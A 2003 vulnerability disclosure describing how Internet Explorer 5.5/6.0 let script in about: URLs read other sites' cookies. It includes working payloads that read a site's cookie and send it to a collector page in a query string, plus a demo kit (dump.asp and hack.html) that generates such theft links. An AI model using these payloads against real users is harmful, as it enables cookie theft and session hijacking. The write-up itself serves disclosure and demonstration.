IE Cookie Vulnerability

By:  Abdul Habra
Email: ahabra@yahoo.com
Version:  0.1
Date:  March 28, 2003

1. Introduction

When using Microsoft's Internet Explorer 5.5 or 6.0 to visit a malicious web site, the web site can read cookies stored on the user's machine by other web sites. Microsoft has released a patch to fix this problem that is available at: 

http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp

You can also get more details about this at: http://shiflett.org/

2. How Does It Work

2.1 Script in about:

Using the about: prefix in the URL, a URL can contain an executable script. For example:

  1. Type the following in the address bar of IE:

    about://<script%20language=javascript>alert('Vulnerable')</script>
  2. Push <Enter>
  3. A popup window will appear with the message: Vulnerable.

The above shows that we can execute a JavaScript directly in the URL.

2.2 Get The Cookie

The JavaScript can read the cookie for any web site we choose. For example, to read the cookie for yahoo.com:

about://www.yahoo.com/<script%20language=javascript>alert(document.cookie)</script>

This will show the yahoo cookie in a message box.

2.3 Redirect Cookie

Instead of showing the cookie, we can redirect to any other web site passing the cookie in the query string.

For this test, assume the following:

  1. The web site to redirect to is http://localhost/
  2. The web site has the following ASP page: hackCookie/dump.asp
  3. The dump.asp page reads a request parameter named cookies

Using the above information, the URL will be:

about://www.yahoo.com/
<script%20language=javascript>
document.location=
'http://localhost/hackCookie/dump.asp?cookies='+document.cookie
</script >

(Note: Although the above URL appears in several lines, it should be entered as one line and without any line breaks.)

If we put the above URL in a page that the user will visit, the page can read the cookie and send it to any server.

2.4 Retrieve the Cookie's Data

When dump.asp page retrieves the cookie data, it can do whatever it chooses with it, for example saving it to a database for later processing. However, for this test, dump.asp will just display the value of the cookie in the user's browser.

To read the cookies request parameter in ASP:

cook= Request.querystring("cookies")

3. Demo

To demonstrate the whole process, I have created a demonstration that you can run on your server. It consists of two files:

  1. dump.asp: An ASP page that reads all its request's data and dump it back to the client.
  2. hack.html: Allows the tester to select what web site cookie he/she wants to send to dump.asp, then send the cookie's data.

To run it, you need to create an IIS folder named hackCookie and copy the above files into it.

The following snapshot shows how hack.html displays:

4. Listing

4.1 dump.asp

1   <%@ language = vbscript %>
2 <h3>Request Dumper</h3>
3 This page will dump its request's data<br>
4 <%
5 Response.Write("<br><b>QueryString</b><br>")
6 Response.Write("Variable count=" & Request.QueryString.Count & "<br>")
7 for each item in request.querystring
8   response.write(item & "=" & request.querystring(item) & "<br>")
9 next
10 Response.Write("<br><b>Forms</b><br>")
11 Response.Write("Variable Count=" & Request.Form.Count & "<br>")
12 for each item in Request.Form
13   Response.Write(item & "=" & Request.Form(item) & "<br>")
14 next
15 Response.Write("<br><b>Cookies</b><br>")
15 Response.Write("Variable Count=" & Request.Cookies.Count & "<br>")
17 for each item in Request.Cookies
18   Response.Write(item & "=" & Request.Cookies(item) & "<br>")
19 next
20 %>

4.2 hack.html

1   <HTML><HEAD>
2 <script language=javascript>
3 function onClick() {
4   // get the new link
5   var v= txtUrl.value;
6   // change first url
7   durl1.innerText = "Changed to: " + v;
8   durl1.href = v;
9
10   // strip http://
11   var i= v.indexOf("//");
12   if (i>=0) {
13     v= v.substring(i+2, v.length);
14   }
15
16   // change 2'nd url
17   // read the cookie from the browser and put with a url
18   var urlStart= "about://";
19   // change this to whatever page you want to grab cookies
20   var dumpPage = "http://localhost/hackCookie/dump.asp?cookie=";
21   var scriptStart="<script%20language=javascript>";
22   var scriptEnd= "</" + "script>";
23
24   var ur= urlStart + v + "/" +
25           scriptStart +
26           "document.location='" + dumpPage +
27           "' + document.cookie" +
28           scriptEnd;
29   durl2.href= ur;
30 }
31 </script>
32
33 </head><BODY>
34 <h3>Cookie Dump</h3>
35 Enter a website url to see its cookie on this client<br>
36 (including the <b>http://</b> prefix)<br>
37
38 <input name="txtUrl" size="40" value="http://www.yahoo.com" >
39 <button onclick="onClick()">Update URLs</button>
40
41 <br><br>
42 URL to what's in the text box:
43 <a id="durl1" href="http://www.yahoo.com">
44   Will change when you click the button
45 </a>
46
47 <br><br>
48 Get cookie info of the site in the textbox and send it to
49 <A id="durl2" href=
50 "about://www.yahoo.com/<script%20language=javascript>document.location='http://localhost/hackCookie/dump.asp?cookies='+document.cookie</script >"
51 >
52 dump.asp
53 </A>
54 </BODY></HTML>

Page Last Updated 2003.03.28